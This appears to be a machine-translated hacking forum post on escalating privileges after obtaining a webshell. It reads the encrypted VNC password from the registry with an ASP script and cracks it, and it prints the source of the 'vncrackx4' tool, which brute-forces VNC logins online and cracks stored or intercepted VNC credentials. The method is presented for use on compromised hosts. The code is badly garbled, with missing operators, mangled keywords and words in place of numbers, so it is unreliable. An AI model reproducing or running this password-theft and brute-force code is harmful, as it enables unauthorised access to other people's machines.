Author: flowers
Many times you upgrade the permissions generally use servu, or find the SA account password. In fact, in addition to this VNC is typically operated with the highest authority, and is similar to the graphical interface, functionality, and remote terminals.
If you get a host's WebShell, you want to improve the permissions, you find that the host runs the VNC service, you can consider the following method.
By default, the password of the VNC server is placed in the registry, which is only for this situation.
First use the ASP to read the encrypted password in the registry and then use the crack tool to crack.
I give everyone an ASP script that reads VNC passwords. By default, VNC password is stored in HKCU / Software / Orl / WinVNC3 / Password.
SET WSHSHELL = Server.createObject ("wscript.shell")
BKEY = WSHSHELL.REGREGREGREGREAD ("HKCU / Software / Orl / WinVNC3 / Password")
For Each Str in BKey
Response.write HEX (STR)
NEXT
After reading, the result is similar to 49 40 15 F9 A3 5E 8B 22 This hexadecimal, this is a password encrypted by VNC. We can use VNCX4
Crack it, VNCX4 is very simple, just enter the command line
C: /> vncx4 -w
Then enter each hexadecimal data above, and it will be done after a carriage return is lost.
For example, I give a test
H: / TOOL> VNCX4 -W
49
40
15
F9
A3
5E
8b
twenty two
Entered Hex String: 49 40 15 F9 A3 5E 8B 22
VNC Password: 123456
Ok, I give the source code and compiler of this tool, the compiler is at the bottom.
/ * Project Code: Vncrack for Windows (VNX4)
*
* Fx
* Phenoelit
http://www.phenoelit.de/)
* (c) 2K
*
* Blocking delay idea by stonneway.
* /
#include
#include
#include
File: // # include
#include
#include "d3des.h"
#include "vncauth.h"
Extern UNSIGNED Char fixedkey [8];
#define splash "vncrackx4 - by Phenoelit)
http://www.phenoelit.de/)/n "
INT Verbose = 0, LBF = 0;
Char * schallange = null, * SRESPONSE = NULL;
Void interactive (void);
Void Cr_crack (char * wordlist);
Void * sec_malloc (size_t size) {
Void * p;
IF ((p = malloc (size)) == null) {
FPRINTF (stderr, "malloc () failed for% d bytes / n", size);
EXIT (-1);
}
MEMSET (P, 0, Size);
Return P;
}
Void usage (void) {
Printf ("vncrackx4 / n"
"by Phenoelit
http://www.phenoelit.de/)/n/n"/
Usage: / n "
"Online: ./vncrack-h target.host.com -w wordlist.txt [-opt's] / n" "Windows Interactive Mode: ./vncrack -w / n"
"/ TENTER HEX Key One Byte Per Line - Find IT IN / N"
"/ t // hkey_current_user // Software // ORL // WinVNC3 // Password OR / N"
"/T//hKey_users//.default//software//orl//winvnc3//password/n/n"
"Options for online mode: / n"
"-V / tverbose (repeat -v for more) / n"
"-p p / tconnect to port p instead of 5900 / n"
"Options for phoss intercepted challages: / n"
"-c / tchallange from phoss output / n"
"-r / Tresponse from Phoss Output / N"
);
EXIT (-1);
}
Void Sleep (DWORD MS) {
DWORD T1;
T1 = gettickcount ();
While (GettickCount () <(t1 ms));
}
INT main (int Argc, char ** argv) {
Int sfd; / * socket * /
Unsigned long dest_ip;
Struct SockAddr_in dest_addr;
Char * RBUF;
UNSIGNED CHAR ATYPE [4];
Unsigned char challange [16];
Char * vnchost = NULL;
U_SHORT VNCPORT = 5900;
INT I, ANI = 0;
Char * WordList = NULL;
File * fd;
Char * tryword;
Char Servertext [255];
Char * sthelp;
Int conway = 90;
INT redocount = 0;
INT redosleep = 10;
/ * Check the command line options * /
For (i = 1; I switch (argv [i] [1]) {
Case 'V': // Verbose
Verbose ;
Break;
Case 'P':
IF (argv [ i] == null) USAGE ();
IF ((vncport = ATOI (Argv [I])) == 0) {
FPrintf (stderr, "Wrong Port Number:% S / N", Argv [I]);
EXIT (-1);
}
Break;
Case 'h':
IF (argv [ i] == null) USAGE ();
vnchost = (char *) sec_malloc (strlen (argv [i]) 1);
STRCPY (Vnchost, Argv [I]);
Break;
Case 'W':
IF (argv [ i] == null) USAGE ();
WordList = (char *) sec_malloc (strlen (argv [i]) 1); strcpy (WordList, Argv [i]);
Break;
Case 'W':
Interactive ();
Break;
Case 'C':
IF (argv [ i] == null) USAGE ();
SCHALLANGE = (char *) sec_malloc (strlen (argv [i]) 1);
STRCPY (Schallange, Argv [I]);
Break;
Case 'R':
IF (argv [ i] == null) USAGE ();
SRESPONSE = (char *) SEC_MALLOC (Strlen (Argv [i]) 1);
STRCPY (SRESPONSE, Argv [I]);
Break;
Case 'R':
IF (argv [ i] == null) USAGE ();
RedOSleep = ATOI (Argv [i]);
Break;
DEFAULT:
USAGE ();
}
}
IF (Schallange || SRESPONSE) {
Printf (Splash);
Cr_crack (wordlist); / * EXIT IS DONE Here * /
}
IF (! ("(VNCHOST & VNCPORT && WordList) USAGE ();
Printf (Splash);
/ * Host * /
Dest_ip = inet_addr (vnchost);
Memcpy (& DEST_ADDR.SIN_ADDR, & DEST_IP, SIZEOF (DEST_IP));
dest_addr.sin_port = htons (vncport);
dest_addr.sin_family = af_INet;
/ * Make Sure We Can Talk Winsock
Comment: i like to enclose this, Because IT is so ugly * /
{
Word wversionRequested;
Wsadata wsadata;
Int Err;
WVersionRequested = MakeWord (1, 1);
Err = WSAStartup (WVersionRequested, & WSADATA);
IF (Err! = 0) {
FPRINTF (stderr, "unable to start networking);
EXIT (-1);
}
} // WSA and Go
IF ((fd = fopen (wordlist, "rt")) == NULL) {
FPrintf (stderr, "unable to open wordlist% s / n", wordlist);
EXIT (-1);
}
Tryword = sec_malloc (256);
While (FGETS (Tryword, 255, FD)! = null) {
/ * cut the word * /
IF (Tryword [strlen (tryword) -1] == '/ n') Tryword [strlen (tryword) -1] = '/ 0';
RedoClosed:
IF (verbose) {
Printf ("/ NTRYING '% s' ...", tryword);
Fflush (stdout);
}
IF ((SFD = Socket, Sock_Stream, 0) == Invalid_socket) {fprintf (stderr, "unable to get a socket);
EXIT (-1);
}
IF (Connect (SFD, STRUCT SOCKADDR *) & DEST_ADDR, SIZEOF (DEST_ADDR))! = 0) {
FPRINTF (stderr, "Connect Failed (% D) ./ n", wsagetlasterror ());
EXIT (-1);
}
/ * CONNUNICATION STARTS with Server-> Client Version Packet * /
RBUF = SEC_Malloc (100);
IF (RECV (SFD, RBUF, 100, 0) <0) {
FPRINTF (stderr, "rv ()");
EXIT (-1);
}
IF (Verbose> 1) Printf ("/ Nserver Protocol Version:% S", RBUF);
/ * BOUNCE this message back - so the server will pay suline * /
IF (SND (SFD, RBUF, Strlen (RBUF), 0) <0) {
FPRINTF (STDERR, "Send ()");
EXIT (-1);
}
IF (RECV (SFD, Atype, Sizeof (atype), 0) <0) {
FPRINTF (stderr, "rv ()");
EXIT (-1);
}
IF (Verbose> 1) {
Printf ("Authentication Type:");
For (i = 0; i <4; i ) {Printf ("% x", atype [i]);
Printf ("/ n");
}
Switch (atype [3]) {
Case 0:
FPRINTF (stderr, "server told me: connection close / n");
IF (verbose) {
// Try to Retrieve The Reason
MEMSET (ServerText, 0, SizeOf (ServerText));
IF (RECV (SFD, ServerText, SizeOf (ServerText), 0) <0) {
FPRINTF (stderr, "rv () in verbose");
EXIT (-1);
} else {
STHELP = ServerText;
STHELP = 4;
FPRINTF (stderr, "server says:% s / n", sthelp);
}
IF ("/ TWAITI for Blocking Disable / N");
SLEEP (RedOSleep * 1000);
IF ((Redocount ) <3) {
Goto redoclosed;
} else {
FPRINTF (stderr, "/ tgiving up (increase -r) / n");
}
}
EXIT (-1);
Break; / * NOT Reached * /
Case 1:
Printf ("/ N >>>>>>>>>>>>>> / N"
"Server Does Not Require Authentication! / N" >>>>>>>>>>>>> / N ");
EXIT (-1);
Break; / * NOT Reached * /
Case 2:
IF (Verbose> 1)
Printf ("Authentication Type 'VNC Authentication' - Fine / N");
Break;
DEFAULT:
FPRINTF (stderr, "unknown authentication requested by server / n");
EXIT (-1);
}
Redocount = 0;
IF (RECV (SFD, Challange, Sizeof (Challange), 0) <0) {
FPRINTF (stderr, "rv ()");
EXIT (-1);
}
IF (Verbose> 1) {
Printf ("Challange:");
For (i = 0; i <16; i ) {printf ("% x", challange [i]);
Printf ("/ n");
}
/ * ENCRYPT Challange with password and send this fuck to the server * /
VncencryptBytes (Challange, Tryword);
IF (SFD, CHALLANGE, SIZEOF (CHALLANGE), 0) <0) {
FPRINTF (stderr, "auth send ()");
EXIT (-1);
}
Atype [3] = 0;
IF (RECV (SFD, Atype, Sizeof (atype), 0) <0) {
FPrintf (stderr, "auth rec ()");
EXIT (-1);
}
Switch (atype [3]) {
Case 0:
Printf ("/ N >>>>>>>>>>>>>> / N"
"Password:% S / N"
">>>>>>>>>>>>>>>> / n ", tryword);
Free (Tryword);
exit (0);
Break; / * NOT Reached * /
Case 1: / * 'Normal' Failed * /
IF (Verbose) Printf ("failed / n");
Break;
Case 2: / * Too Many * /
Printf ("Server IS Angry, Waiting for Calm Down ... / N");
Sleep (10000);
Break;
DEFAULT:
FPRINTF (stderr, "unknown response / n");
EXIT (-1);
}
Shutdown (SFD, 2);
CloseSocket (SFD);
MEMSET (Tryword, 0,256);
}
Free (Tryword);
Fclose (FD);
Return 0;
}
Void interactive (void) {
UNSIGNED Char * Pass;
INT I;
Char C;
Pass = (char *) sec_malloc (9);
For (i = 0; i <8; i ) {scanf ("% x", & c);
Pass [i] = C;
}
Printf ("Entered Hex String:");
For (i = 0; i <8; i ) {Printf ("% x", pass [i]);}
Printf ("/ n");
Deskey (FixedKey, DE1);
DES (Pass, pass);
Printf ("VNC Password:% S / N", PASS);
exit (0);
}
Void cr_crack (char * wordlist) {
INT I, J;
#define CRL 16
Char CHL [CRL 1];
Char RSP [CRL 1];
Char Tchl [CRL 1];
Char TS [3];
File * fd;
Char * tryword;
CHAR BFT [9];
Char cset1 [] =
"AbcdefghijklmnopQrstuvwxyz"
"AbcdefghijklmnopQrstuvwxyz"
"1234567890! /" $% & / () =? `'' * _:; -., # }] [{^ <> | / 0";
#define cset1_len (92)
INT CNT [8];
TIME_T T1, T2;
IF (! WordList) {
FPRINTF (stderr, "supply wordlist file!");
EXIT (-1);
}
IF ((! Schallange) || (! SRESPONSE)) {
USAGE ();
}
IF
(Strlen (Schallange)! = 16 * 2)
|| (Strlen (SRESPONSE)! = 16 * 2)
) {
FPRINTF (stderr,
"Challange and response Have to be 32 characters each / n");
EXIT (-1);
}
MEMSET (& CHL, 0, CRL 1);
MEMSET (& TCHL, 0, CRL 1);
MEMSET (& RSP, 0, CRL 1);
MEMSET (& TS, 0, 3);
J = 0;
For (i = 0; I Strncpy (TS, & Schallange [J], 2);
CHL [I] = (unsigned char) STRTOL (TS, NULL, 16);
STRNCPY (TS, & SRESPONSE [J], 2);
RSP [I] = (unsigned char) Strtol (TS, NULL, 16);
J = 2;
}
IF (verbose) {
Printf ("Challange:");
For (i = 0; i printf ("% x", (unsigned char) chl [i]);
}
Printf ("/ n");
Printf ("Response:");
For (i = 0; i printf ("% x", ("% x", (unsigned char) RSP [I]);
}
Printf ("/ n");
}
IF ((fd = fopen (wordlist, "rt")) == NULL) {
FPRINTF (stderr, "could not open wordlist / n");
EXIT (-1);
}
Tryword = sec_malloc (256); while (fgets (tryword, 255, fd)! = null) {
Tryword [Strlen (Tryword) -1] = '/ 0';
/ * TRY THIS WORD * /
Memcpy (TCHL, CHL, CRL);
VncencryptBytes (TCHL, Tryword);
IF (Verbose> 1) {
For (i = 0; i printf ("% x", ("% x", (unsigned char) RSP [I]);
}
Printf ("/ n");
For (i = 0; i printf ("% x", (unsigned char) TCHL [I]);
}
Printf ("/ n");
}
IF (! Memcmp (TCHL, RSP, CRL) {
Printf ("/ N >>>>>>>>>>>>>> / N"
"Password:% S / N"
">>>>>>>>>>>>>>>> / n ", tryword);
Free (Tryword);
exit (0);
} else {
IF (Verbose) Printf ("% s failed / n", tryword);
}
MEMSET (Tryword, 0,256);
}
Fclose (FD);
Free (Tryword);
Printf ("--------------------------------- / n"
"WordList Failed - Going Brute Force / N"
"----------------------------- / n");
T1 = gettickcount ();
BFT [8] = '/ 0';
BFT [1] = '/ 0';
Printf ("/ tdepth I / n");
For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];
IF (Verbose)
Printf ("try:% s / n", bft);
Memcpy (TCHL, CHL, CRL);
VncencryptBytes (TCHL, BFT);
IF (! Memcmp (TCHL, RSP, 16)) {
Printf ("/ N >>>>>>>>>>>>>> / N"
"Password:% S / N"
">>>>>>>>>>>>>> / N ",
BFT);
exit (0);
}
} // for 0
BFT [2] = '/ 0';
Printf ("/ TDepth II / N");
For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];
For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];
IF (Verbose)
Printf ("try:% s / n", bft);
Memcpy (TCHL, CHL, CRL);
VncencryptBytes (TCHL, BFT);
IF (! Memcmp (TCHL, RSP, 16)) {
Printf ("/ N >>>>>>>>>>>>>>>> / N" "Password:% S / N"
">>>>>>>>>>>>>> / N ",
BFT);
exit (0);
}
} // for 0
} // for 1
/ ************ /
BFT [3] = '/ 0';
Printf ("/ TDepth III / N");
For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];
For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];
For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];
IF (Verbose)
Printf ("try:% s / n", bft);
Memcpy (TCHL, CHL, CRL);
VncencryptBytes (TCHL, BFT);
IF (! Memcmp (TCHL, RSP, 16)) {
Printf ("/ N >>>>>>>>>>>>>> / N"
"Password:% S / N"
">>>>>>>>>>>>>> / N ",
BFT);
exit (0);
}
} // for 0
} // for 1
} file: // 2
/ ************ /
BFT [4] = '/ 0';
Printf ("/ tdepth IV / n");
For (CNT [3] = 0; CNT [3] bft [3] = cset1 [CNT [3]];
For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];
For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];
For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];
IF (Verbose)
Printf ("try:% s / n", bft);
Memcpy (TCHL, CHL, CRL);
VncencryptBytes (TCHL, BFT);
IF (! Memcmp (TCHL, RSP, 16)) {
Printf ("/ N >>>>>>>>>>>>>> / N"
"Password:% S / N"
">>>>>>>>>>>>>> / N ",
BFT);
exit (0);
}
} // for 0
} // for 1
} file: // 2
} file: // 3
/ ************ /
BFT [5] = '/ 0';
Printf ("/ tdepth v / n");
For (CNT [4] = 0; CNT [4] bft [4] = cset1 [CNT [4]];
For (CNT [3] = 0; CNT [3] bft [3] = cset1 [CNT [3]];
For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];
For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]]; for (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0] ];
IF (Verbose)
Printf ("try:% s / n", bft);
Memcpy (TCHL, CHL, CRL);
VncencryptBytes (TCHL, BFT);
IF (! Memcmp (TCHL, RSP, 16)) {
Printf ("/ N >>>>>>>>>>>>>> / N"
"Password:% S / N"
">>>>>>>>>>>>>> / N ",
BFT);
exit (0);
}
} // for 0
} // for 1
} file: // 2
} file: // 3
} file: // 4
/ ************ /
BFT [6] = '/ 0';
Printf ("/ tdepth vi / n");
For (CNT [5] = 0; CNT [5] bft [5] = cset1 [CNT [5]];
For (CNT [4] = 0; CNT [4] bft [4] = cset1 [CNT [4]];
For (CNT [3] = 0; CNT [3] bft [3] = cset1 [CNT [3]];
For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];
For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];
For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];
IF (Verbose)
Printf ("try:% s / n", bft);
Memcpy (TCHL, CHL, CRL);
VncencryptBytes (TCHL, BFT);
IF (! Memcmp (TCHL, RSP, 16)) {
Printf ("/ N >>>>>>>>>>>>>> / N"
"Password:% S / N"
">>>>>>>>>>>>>> / N ",
BFT);
exit (0);
}
} // for 0
} // for 1
} file: // 2
} file: // 3
} file: // 4
} file: // 5
/ ************ /
BFT [7] = '/ 0';
Printf ("/ tdepth vii / n");
For (CNT [6] = 0; CNT [6] bft [6] = cset1 [CNT [6]];
For (CNT [5] = 0; CNT [5] bft [5] = cset1 [CNT [5]];
For (CNT [4] = 0; CNT [4] bft [4] = cset1 [CNT [4]];
For (CNT [3] = 0; CNT [3] bft [3] = cset1 [CNT [3]];
For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];
For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];
For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];
IF (Verbose)
Printf ("try:% s / n", bft); MEMCPY (TCHL, CHL, CRL);
VncencryptBytes (TCHL, BFT);
IF (! Memcmp (TCHL, RSP, 16)) {
Printf ("/ N >>>>>>>>>>>>>> / N"
"Password:% S / N"
">>>>>>>>>>>>>> / N ",
BFT);
exit (0);
}
} // for 0
} // for 1
} file: // 2
} file: // 3
} file: // 4
} file: // 5
} file: // 6
/ ************ /
BFT [8] = '/ 0';
Printf ("/ tdepth viii / n");
For (CNT [7] = 0; CNT [7] bft [7] = cset1 [CNT [7]];
For (CNT [6] = 0; CNT [6] bft [6] = cset1 [CNT [6]];
For (CNT [5] = 0; CNT [5] bft [5] = cset1 [CNT [5]];
For (CNT [4] = 0; CNT [4] bft [4] = cset1 [CNT [4]];
For (CNT [3] = 0; CNT [3] bft [3] = cset1 [CNT [3]];
For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];
For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];
For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];
IF (Verbose)
Printf ("try:% s / n", bft);
Memcpy (TCHL, CHL, CRL);
VncencryptBytes (TCHL, BFT);
IF (! Memcmp (TCHL, RSP, 16)) {
Printf ("/ N >>>>>>>>>>>>>> / N"
"Password:% S / N"
">>>>>>>>>>>>>> / N ",
BFT);
exit (0);
}
} // for 0
} // for 1
} file: // 2
} file: // 3
} file: // 4
} file: // 5
} file: // 6
} file: // 7
T2 = gettickcount ();
Printf ("DEPTH VIII (% 20.4F WPS) / N", (T2-T1) / 63);
Printf ("Not in Character Set! / N");
exit (0);
}
